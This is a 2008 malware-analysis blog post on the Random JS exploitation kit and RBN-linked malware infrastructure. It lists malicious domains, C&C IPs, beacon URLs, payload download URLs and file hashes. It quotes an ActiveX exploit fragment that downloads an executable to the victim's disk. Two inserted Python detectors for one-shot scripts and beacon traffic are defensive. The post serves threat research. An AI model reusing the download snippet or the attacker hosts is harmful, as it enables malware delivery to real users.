Tuesday, January 15, 2008

The Random JS Malware Exploitation Kit

The Random JS infection kit, as originally named by Finjan, is perhaps the first publicly announced malicious innovation of 2008. I've managed to obtain a copy of a sample .js, witness the filename change on the next request, and see the complete disappearance of any .js on the third visit. Here's some press coverage - "Over 10,000 trusted websites infected by new Trojan toolkit" :

"The random js attack is performed by dynamic embedding of scripts into a webpage. It provides a random filename that can only be accessed once. This dynamic embedding is done in such a selective manner that when a user has received a page with the embedded malicious script once, it will not be referenced again on further requests. This method prevents detection of the malware in later forensic analyses."

And several more articles - "Hacking Toolkit Compromises Thousands Of Web Servers" ; "Trojan toolkit infected 10000 Web sites in December" ; "Legitimate sites serving up stealthy attacks". Compared to all of the malware embedded attacks during 2007, which served the malware, as well as the exploits themselves, from a secondary domain, the new attack technique hosts everything on the infected domain. Sample random and local malware locations :

bunburyymas.com/ihkxtmzl
bunburyymas.com/odjiffkl
techicorner.com/bcuoixqf
otcash.com/ktehxwmj
otcash.com/soqutkue
otcash.com/bemkwijz

Sample .js random filenames :

cgolu.js; czynd.js; eenom.js; eqfps.js; erztp.js; frpmg.js; iggmy.js; jiodm.js; khkev.js; kksyr.js; kobgw.js; kolqj.js; lvmlt.js; nrvaj.js; oalhi.js; pcqab.js; tezam.js; tfxep.js; unolc.js; vduoz.js;
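The one-shot behaviour described in the press quote above (a random same-host .js name that is referenced exactly once and then disappears) can be checked for by fetching a page repeatedly and comparing the script references between fetches. The following is an added example written for this post, not code from the original or from Finjan: it extracts the script includes from three constructed fetches of a hypothetical page on example-infected.test and flags includes that are served from the same host, have a five-lowercase-letter name like the samples listed above, and appear in only one fetch.

```python
import re
from collections import Counter
from urllib.parse import urljoin, urlparse

# Constructed sample: three successive fetches of the same page from one
# hypothetical infected host (example-infected.test is a placeholder).
# Fetch 1 carries one random same-host .js, fetch 2 carries a different
# one, fetch 3 carries none, mirroring the behaviour the post describes.
SAMPLE_FETCHES = [
    ('http://example-infected.test/index.html',
     '<html><head><script src="/jquery.js"></script>'
     '<script src="/cgolu.js"></script></head><body>hi</body></html>'),
    ('http://example-infected.test/index.html',
     '<html><head><script src="/jquery.js"></script>'
     '<script src="/eenom.js"></script></head><body>hi</body></html>'),
    ('http://example-infected.test/index.html',
     '<html><head><script src="/jquery.js"></script>'
     '</head><body>hi</body></html>'),
]

SCRIPT_SRC = re.compile(r'<script[^>]+src\s*=\s*["\']([^"\']+)["\']', re.I)
# Name shape taken from the sample filenames above: five lowercase letters + .js
RANDOM_NAME = re.compile(r'^[a-z]{5}\.js$')


def script_refs(page_url, html):
    """Return the absolute URLs of all <script src=...> includes on a page."""
    return [urljoin(page_url, src) for src in SCRIPT_SRC.findall(html)]


def flag_one_shot_scripts(fetches):
    """Return sorted (url, reasons) pairs for includes that look like one-shot
    random scripts: random 5-letter basename and present in exactly one fetch.
    'same-host' is recorded as an extra reason when the include is local."""
    page_host = urlparse(fetches[0][0]).hostname
    seen = Counter(u for page_url, html in fetches
                   for u in set(script_refs(page_url, html)))
    flagged = []
    for url, count in seen.items():
        parts = urlparse(url)
        reasons = []
        if parts.hostname == page_host:
            reasons.append('same-host')
        if RANDOM_NAME.match(parts.path.rsplit('/', 1)[-1]):
            reasons.append('random-name')
        if count == 1 and len(fetches) > 1:
            reasons.append('one-shot')
        if 'random-name' in reasons and 'one-shot' in reasons:
            flagged.append((url, reasons))
    return sorted(flagged)


if __name__ == '__main__':
    for url, reasons in flag_one_shot_scripts(SAMPLE_FETCHES):
        print(url, ', '.join(reasons))
```

The stable jquery.js include is seen in all three fetches and is never flagged; the two random names are each seen once and are reported. When running this against a real site, fetch from different source addresses and with fresh cookies, since the post notes the script is only referenced on the first request a given visitor makes.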

Sample malware hosting URL snippet :

bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:\\mosvs8.exe",5,1,"mosvs8"); } catch(

Copies of the malware obtained, mosvs8.exe -- logically submitted to each and every anti virus vendor via VirusTotal, just like every sample I've ever come across in incident responses -- attempt to connect to 206.53.51.75, 206.53.56.30 and back39409404.com, making naughty web requests such as :

206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:38

back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:35

The following files are still partly accessible at the active C&C's (the first one, for instance) :

cgi-bin/forms.cgi
cgi-bin/cert.cgi
cgi-bin/options.cgi
cgi-bin/ss.cgi
cgi-bin/pstore.cgi
cgi-bin/cmd.cgi
cgi-bin/file.cgi
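The two beacon requests shown above share a fixed parameter set (user_id, socks, version_id, passphrase, crc, uptime) against cgi-bin/options.cgi, and the same bot id contacts both C&C hosts in turn, which is the fallback behaviour a proxy log would reveal. As an added example written for this post (not code from the original), here is a small detector that runs over constructed proxy log lines: the options.cgi URL shape and the two C&C hosts are taken from the post, while the timestamps, client addresses and the example.test hosts are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log, Squid-like "timestamp client method url".
# Lines 1 and 3 reproduce the beacon URLs from the post; lines 2 and 4 are
# benign decoys (an options.cgi without the beacon parameters, a static file).
SAMPLE_LOG = """\
1200400001.123 10.0.0.5 GET http://206.53.51.75/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:38
1200400002.456 10.0.0.7 GET http://www.example.test/cgi-bin/options.cgi?lang=en
1200400003.789 10.0.0.5 GET http://back39409404.com/cgi-bin/options.cgi?user_id=3335213046&socks=6267&version_id=904&passphrase=fkjvhsdvlksdhvlsd&crc=3c64cb2e&uptime=00:00:58:35
1200400004.000 10.0.0.9 GET http://cdn.example.test/static/app.js
"""

# Parameter set every beacon in the post carries; all must be present.
BEACON_PARAMS = {'user_id', 'socks', 'version_id', 'passphrase', 'crc', 'uptime'}

LINE = re.compile(r'^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$')


def is_beacon(url):
    """True when the URL targets cgi-bin/options.cgi with the full beacon parameter set."""
    parts = urlsplit(url)
    if not parts.path.endswith('/cgi-bin/options.cgi'):
        return False
    return BEACON_PARAMS <= set(parse_qs(parts.query))


def find_beacons(log_text):
    """Return one record per beacon line: client, C&C host, bot id and reported uptime."""
    hits = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m or not is_beacon(m['url']):
            continue
        parts = urlsplit(m['url'])
        query = parse_qs(parts.query)
        hits.append({'client': m['client'], 'host': parts.hostname,
                     'user_id': query['user_id'][0], 'uptime': query['uptime'][0]})
    return hits


def c2_hosts_by_bot(hits):
    """Group the C&C hosts each bot id contacted, in order of first appearance.
    More than one host per bot id shows the fallback C&C list in use."""
    by_bot = defaultdict(list)
    for h in hits:
        if h['host'] not in by_bot[h['user_id']]:
            by_bot[h['user_id']].append(h['host'])
    return dict(by_bot)


if __name__ == '__main__':
    beacons = find_beacons(SAMPLE_LOG)
    for h in beacons:
        print(h['client'], '->', h['host'], 'bot', h['user_id'], 'uptime', h['uptime'])
    print(c2_hosts_by_bot(beacons))
```

Matching on the full parameter set rather than on the two hosts keeps the check useful when the C&C moves; the other cgi-bin scripts listed above can be covered the same way once their parameter shapes are known.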

Did anti virus vendors come up with a detection pattern for the .js already? Partly.

Detection rate : 11/32 (34.38%) - JS.IEslice.aq; JS/SillyDlScript.DG; Exploit:JS/Mult.K
File size: 31679 bytes
MD5: 93152dc2392349d828526157bf601677
SHA1: 1b10790d16c9c0d87132d40503b37f82b7f03560

And now that we've witnessed the execution of such an advanced and random attack approach, which limits the possibility of assessing the impact of a malware embedded attack the way it has been done so far, we can only speculate on what's to come by the end of the first quarter of 2008. From my perspective, however, the smartest thing about this attack technique is that it keeps the leads left behind to a minimum, thus shifting the responsibility onto the infected host and limiting the possibility of easily expanding on the rest of their ecosystem. Moreover, even though the module, or the actual kit if it really is a kit, is a Proprietary Malware Tool for the time being, it will sooner or later leak out and turn into a commodity, just like MPack and IcePack are these days.

RBN's Fake Account Suspended Notices

In the last quarter of 2007, under the public pressure put on the Russian Business Network's malicious practices, the RBN started faking the removal of malicious domains from its network by placing fake account suspended notices on them while continuing the malware and exploit serving campaigns. And since I constantly monitor RBN activity, in particular their relationship with the New Media Malware Gang and Storm Worm, a relationship that I've in fact established several times before, a recently assessed malicious domain further expands their underground ecosystem. Let the data speak for itself :

dev.aero4.cn/adpack/index.php (195.5.116.244) once deobfuscated loads dev.aero4.cn/adpack/load.php :

Detection rate : 11/32 (34.38%)
File size: 6656 bytes
MD5: 5eb0ee32613d8a611b6dc848050f3871
SHA1: 55c0448645a8ed2e14e6826fae25f8f9c868be30

It gets even more interesting as the downloader attempts to download the following :

88.255.94.250/s2/200.exe
88.255.94.250/s2/m.exe
88.255.94.250/s2/d.exe
88.255.94.250/s2/un.php

And as I've already pointed out in a previous post, 88.255.94.250 belongs to the New Media Malware Gang. Moreover, whereas m.exe and d.exe have detection rates of over 50%, 200.exe is impressively detected by one anti virus vendor only :

Detection rate : 1/32 (3.13%)
File size: 33280 bytes
MD5: 9bf9265df5dea81135355d161f3522be
SHA1: 44cdcaf5e8791e10506e3343d73a2993511fa91f

Further continuing this assessment, firewalllab.cn (203.117.111.106) also responds to aero4.cn, and is hosted at AS4657 STARHUBINTERNET AS Starhub Internet Pte Ltd, 31 Kaki Bukit Rd 3, SINGAPORE (previously known as CyberWay Pte Ltd). Even more interesting is the fact that 203.117.111.106 also responds to known New Media Malware Gang domains :

businesswr.cn
fileuploader.cn
firewalllab.cn
otmoroski.cn
otmoroski.info
security4u.cn
tdds.ru
traffshop.ru
x-victory.ru

Furthermore, 203.117.111.106 also makes an appearance at otrix.ru, where in between the obfuscation an IFRAME loads 58.65.233.97/forum.php, which in turn loads two more: 4qobj63z.tarog.us/tds/in.cgi?14 and 4qobj63z.tarog.us/tds/in.cgi?15. Deja vu, again, again and again - 4qobj63z.tarog.us was among the domains used in the malware embedded attack against the French government's site related to Libya, and there I made the connection with the New Media Malware Gang for yet another time.

There's indeed a connection between the RBN, Storm Worm and the New Media Malware Gang. The malware gang is either a customer of the RBN, a partner of the RBN sharing know-how in exchange for infrastructure provided by the RBN, or the RBN's actual operational department. Piece by piece, an ugly puzzle picture emerges, thanks to everyone monitoring the RBN, which is still 100% operational.